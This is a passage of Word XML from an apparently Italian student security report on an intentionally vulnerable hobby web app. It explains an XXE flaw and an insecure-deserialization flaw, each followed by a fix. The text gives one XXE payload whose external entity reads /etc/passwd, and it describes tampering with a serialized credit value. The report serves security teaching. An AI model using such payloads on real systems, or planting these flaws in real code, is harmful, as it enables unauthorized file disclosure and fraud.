      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00B11AA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ntity (XXE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5A1E5" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E48EB75" w14:textId="5160AD4F" w:rsidR="00450AE3" w:rsidRDefault="00450AE3" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel caso in cui un’applicazione fa utilizzo di dati XML, questa vulnerabilità consente a un attaccante di interferire con il normale processamento di tali dati, sfruttando alcuni costrutti tipici del linguaggio XML come DTD e external entities, consentendo spesso l’accesso al filesystem del server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF85CC" w14:textId="2FF08A9F" w:rsidR="0031586D" w:rsidRDefault="009B3431" w:rsidP="00281830">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t>Nel componente HobbiePages è stat</w:t>
      </w:r>
      <w:r w:rsidR="00450AE3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> introdotta la possibilità di inserire un commento nell’hobby di un utente o dal business. </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">Il commento viene scritto in </w:t>
      </w:r>
      <w:r w:rsidR="00450AE3">
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00450AE3" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">e non contiene nessuna </w:t>
      </w:r>
      <w:r w:rsidR="00AC599E" w:rsidRPr="00FC6F6C">
        <w:t>sanitizzazione; dunque,</w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> l’utente può inserire nel commento </w:t>
      </w:r>
      <w:r w:rsidR="00450AE3">
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00450AE3" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C" w:rsidRPr="00FC6F6C">
        <w:t xml:space="preserve">tramite il browser una entity per accedere a file segreti del pc come etc/passwd. </w:t>
      </w:r>
      <w:r w:rsidR="00FC6F6C">
        <w:t>Nella risposta viene ritornato il contenuto del file etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3EDA7" w14:textId="3533419B" w:rsidR="00EB78A7" w:rsidRDefault="00FC6F6C" w:rsidP="00467BBC">
      <w:r>
        <w:t>HobbiePages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70D790" w14:textId="3BD58C6B" w:rsidR="00A54E4E" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C49DDC7" w14:textId="5897C5B2" w:rsidR="00EB78A7" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="313F0A94" wp14:editId="518831E1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-488315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4099560" cy="3499448"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="14893721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3499448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3368C" w14:textId="7291A5EF" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="06A49EDA" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="59E03C1E" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7"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345A6826" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7C156091" w14:textId="77777777" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="71BA6ACC" w14:textId="69C5431F" w:rsidR="00EB78A7" w:rsidRDefault="00FC6F6C" w:rsidP="00467BBC">
      <w:r>
        <w:t>HobbieController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E547FB8" w14:textId="4FACEFA7" w:rsidR="00FC6F6C" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="078B64D5" wp14:editId="47CF0574">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>42545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5250180" cy="2920218"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2899875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180" cy="2920218"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7C203" w14:textId="215C72A2" w:rsidR="00EB78A7" w:rsidRDefault="00EB78A7" w:rsidP="00467BBC"/>
    <w:p w14:paraId="34C84D5F" w14:textId="5C060398"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EDB0864" w14:textId="359BF83F" w:rsidR="0031586D" w:rsidRDefault="00FC6F6C" w:rsidP="00467BBC">
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040F04A" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264EFACF" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t>&lt;!DOCTYPE replace [&lt;!ENTITY ent SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF8AC51" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t xml:space="preserve">      &lt;comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F78673" w14:textId="77777777" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t xml:space="preserve">        &lt;text&gt;&amp;ent;&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707A888" w14:textId="4AB3D135" w:rsidR="00FC6F6C" w:rsidRDefault="00FC6F6C" w:rsidP="00FC6F6C">
      <w:r>
        <w:t xml:space="preserve">      &lt;/comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A264833" w14:textId="7ACCC420" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6345AA20" w14:textId="32B79579" w:rsidR="0031586D" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49DCBA60" wp14:editId="288C0EAF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-45212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4A9AF3F4" w14:textId="07ADD456" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1AEF610E" w14:textId="7D772E15" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="63CD4ECA" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0469379F" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E6E88ED" w14:textId="0747FD07" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0A04A775" w14:textId="6A09E70D" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5A6B9FA0" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D"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661099C0" w14:textId="72B61DD3" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fix: bisogna bloccare l’utilizzo di External Entities, Doctype e altre caratteristiche in modo da impedire l’attacco.</w:t>
      </w:r>
      <w:r w:rsidR="00BD03FB">
        <w:t xml:space="preserve"> Si può sistemare modificando il metodo /comment nel backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE63AE" w14:textId="269F7C4C" w:rsidR="00AA4F9B" w:rsidRDefault="00BD03FB" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70A42CF0" wp14:editId="6BDEFEAA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5362575" cy="2608006"/>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b="46517"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5362575" cy="260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649B" w14:textId="77777777" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CB80C2D" w14:textId="77777777" w:rsidR="00AA4F9B" w:rsidRDefault="00AA4F9B" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F06F1C0" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="22963997" w14:textId="77777777"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Default="00E464AA" w:rsidP="0006778F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Insecure deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F450595" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787E44D5" w14:textId="64DCA223" w:rsidR="00CC03BC" w:rsidRDefault="004E4997" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Questa vulnerabilità si ha quando dati gestiti dall’utente vengono deserializzati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dall’uomo, ma l’oggetto si può facilmente tradurre in un formato leggibile in modo da poterlo modificare correttamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180B3CA" w14:textId="6C8167AA" w:rsidR="00E464AA" w:rsidRDefault="00EF10FE" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo codice è</w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve"> stato aggiunto un campo credit che si incrementa ogni 30 secondi e premia gli utenti più attivi. In tal modo un utente potrebbe voler incrementare il proprio credito a suo favore sfruttando la serializzazione con cui l’oggetto viene inviato al backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E64E1" w14:textId="77777777" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75963575" w14:textId="47B3FC8A" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AccountUser: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16D00B" w14:textId="6FB3B1AC" w:rsidR="00E464AA" w:rsidRPr="00E464AA" w:rsidRDefault="00D03FA6" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D0810B0" wp14:editId="77E15F9B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1149985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>99060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3596754" cy="4465320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="61313790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754" cy="4465320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="310DDC13" w14:textId="26DFB872" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2734F518" w14:textId="0AF94DEE" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B6C1E6C" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="68D19015" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="46A4DD9B" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="64E57F49" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="62DCB206" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="57CAC1A4" w14:textId="77777777" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1984193E" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D80066F" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51FDA723" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5C5C1FE8" w14:textId="25965635" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F5EB102" w14:textId="19F85692" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="32CAFE9B" w14:textId="14B2C495" w:rsidR="00CC03BC" w:rsidRDefault="00CC03BC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="19C8A7CA" w14:textId="3DEECCFE" w:rsidR="00E464AA" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E97A3EB" wp14:editId="5CCEC6DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>339090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6587125" cy="2751584"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="130791304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7125" cy="2751584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve">UserController: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCE910" w14:textId="5674124C" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57054E5C" w14:textId="34B56FA5" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="56CD7B7C" w14:textId="53903476" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="44091CF3" w14:textId="787DBFD9" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="541309E1" w14:textId="79D7DD5B" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D155534" w14:textId="77777777" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1101C9EF" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="53AE8E8A" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BAE3A58" w14:textId="0CAC93CB" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC">
      <w:r>
        <w:t>File per l’exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570CDDE9" w14:textId="1B9FE34F" w:rsidR="00E464AA" w:rsidRDefault="00AB3362" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34FFA6A5" wp14:editId="6D657D24">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1136015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</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4D4C" w14:textId="07A963E6" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="75EF79BB" w14:textId="5B59866F" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38080FC7" w14:textId="53997675" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6E2E534D" w14:textId="1DD4383E" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38E3AB52" w14:textId="5DCA589F" w:rsidR="00E464AA" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B04ACC0" wp14:editId="42B9292B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>913765</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>143510</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E413" w14:textId="6FE1CA77" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7E3A1BC1" w14:textId="3F689263" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5A7C5211" w14:textId="63A31550" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3BB07276" w14:textId="02758C70" w:rsidR="00E464AA" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3673F93C" wp14:editId="72994727">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>113665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5212715" cy="4137660"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>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b="8736"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5212715" cy="413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77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="452E3444" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="18CF2EDA" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="776CEEAF" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23F96853" w14:textId="77777777" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="17C1DAC6" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00987816" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Fix: il campo credit non va inviato come oggetto JSON serializzato dal frontend, ma la gestione viene spostata sul backend, grazie alla presenza di </w:t>
      </w:r>
      <w:r w:rsidR="004E3997">
        <w:t xml:space="preserve">un task periodico </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ogni 30 secondi incrementa il credito, bloccando la possibilità che l’utente possa modificare l’oggetto serializzato e reinviarlo al server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61786096" w14:textId="156217A6" w:rsidR="004E3997" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02ED3A58" wp14:editId="0579A42C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-287655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732568" cy="5794803"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14147529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568" cy="5794803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C740AEC" w14:textId="77777777" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3A4C2539" w14:textId="774BC96B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38183F2D" w14:textId="72B5B0D8" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4CAD8DD7" w14:textId="068629F3" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35FF7A3B" w14:textId="55E63779" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="309FE05B" w14:textId="4010E027" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EF62CE" w14:textId="52F4606B" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="74306243" w14:textId="19D9E13D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6EAF361A" w14:textId="701CA13A" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D2F5AA3" w14:textId="4B75F92A" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6A3E4C4E" w14:textId="13CEA42D" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3750DD8F" w14:textId="62B45578" w:rsidR="004E3997" w:rsidRDefault="004E3997" w:rsidP="00467BBC"/>
